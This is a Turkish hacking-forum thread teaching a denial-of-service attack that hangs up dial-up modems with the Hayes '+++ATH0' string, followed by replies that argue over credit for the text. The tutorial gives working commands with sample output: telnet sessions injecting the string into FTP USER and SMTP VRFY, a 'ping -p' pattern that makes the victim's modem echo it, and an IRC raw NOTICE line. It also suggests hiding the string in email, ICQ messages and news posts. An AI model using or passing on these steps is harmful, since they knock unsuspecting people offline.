Modem Dos Saldırı...
-
Evet Bu dökümanda İse Modemlere Dos Saldırıyı göstereceğim...
Bu dökümanı okurken dikkatinizi verek yavaş yavaş okuyun anlıyarak
yoksa başarılı olamassınız
Hadi başlıyalım....
-----------------------------------------------------------------------------
Piyasadaki bir cok modem Hayes Komut Seti (ATZ, ATDT, ATH0..) kullanirlar.
Maalesef ki(?) bu tip modemler bazi ozel stringlerin i$lenmesine de izin verirler.
Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. i$te hikayenin ozu bu.
Bu attacktan tum modemler etkilenmez.
Ornegin U.S. Robotics, 33.6
(+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez)Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir .
PPP, IP datagramI default olarak sIkI$tIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen
okuyacagindan hat kesilme durumu gercekle$ir;)Tipik attack ornekleri:
1) 21 portuna telnet ile:
elusive# telnet 199.99.99.99 21
Trying 199.99.99.99...
Connected to 192.168.1.1.
Escape character is '^]'.
220 abc FTP server (Version .............](1) Fri Apr 9
23:41:
USER +++ATH0
^]
telnet> close
Connection closed.
elusive# telnet 192.168.1.1 21
Trying 199.99.99.99...
telnet: Unable to connect to remote host: Network is unreachable
elusive#
2) sendmaile telnet ile baglanın (qmail olunca olmuyor) ve "HELO orasi.com" yazın orasi neresiyse baglaninca welcome vs diycektir..
sonra: VRFY +++ATH0
sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu:
550 +++ATH03) ftp'ye baglanın. USER +++ATH0 kullanın.Diycektir ki:
331 Password required for +++ATH0
dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi).4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli,
ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0
yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz)
(Ping modem killer ilk defa MrPhoenix (phoenix@iname.com) tarafindan bahsedilmi$tir.)+++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter)
#ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss5 paket gitti..1-2 paket bazan yetmiyor(nedense??).
cali$madIgI durum:
# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 mspeki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan
cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar.
degilse..maili alan kisi alirken problem ya$ar.ICQ Mesajın içine aynı komutu yazın. Karşı makine büyük olasılıkla hattan düşecektir. (phyton)
Bu komutun yazı ile de olsa yazılı olduğu bir htm dosyasını upload etmeye çalışın %90 bağlantınız kopacak. (phyton)
News serverda deneyin (Bunu denemedim) News servera bu komut içeren bir mesaj atın. Mesajı okumak isteyenler düşecektir. (phyton)
IRC icin bir rivayete gore kar$I tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar..
Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde:
//raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
yukarida satirda hic bir imla ya da yazim hatasI yoktur!.
(ba$ taraftaki iki tane slash da dahiL!)
---------------------------------------------------------------
Şunu Belirtmek isterimki Bu Döküman Alıntıdır...Sorunlarınız için Sitemizden = Tahribat.com 'dan bana ulaşa bilirsiniz...
Kolay gelsin... -
Dökümani hangi siteden aldiysan belirt lütfen. Emege saygili ol biraz.
-
Arkadaşım Arşivimde bulunan Bir Döküman bana Burda emeğe Saygıyı öğretme Bu emeklerin çoğunu Ben veriyorum zaten Bilinmedik birşeyde Deil oturup yassam yazarım... Birşey öğrenmişsiniz emeğe Saygı Aşağıda Alıntı olduğunu yamışım bide Senin için nereden alındığınımı bulayım... biraz anlayış gösterim yazmış olmak için yazmayın...
-
Yani Evet Alıntı Olduğunu belirtmiş zaten site adresini vermesi bence gerekmez.. DemonsGod Saana KAtılıyorum
-
Sağol Elektro Birazdaha Hoş görülü olup düşünerek cevap versek cok sevinicem...
Kolay Gelsin..
-
bi bok anlamadım lan
-
Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. i$te hikayenin ozu bu.Burda adan işi özetlemiş zaten ama dial-upta oluyor adsl için bir şeyler geliştirilmesi gerekiyor:)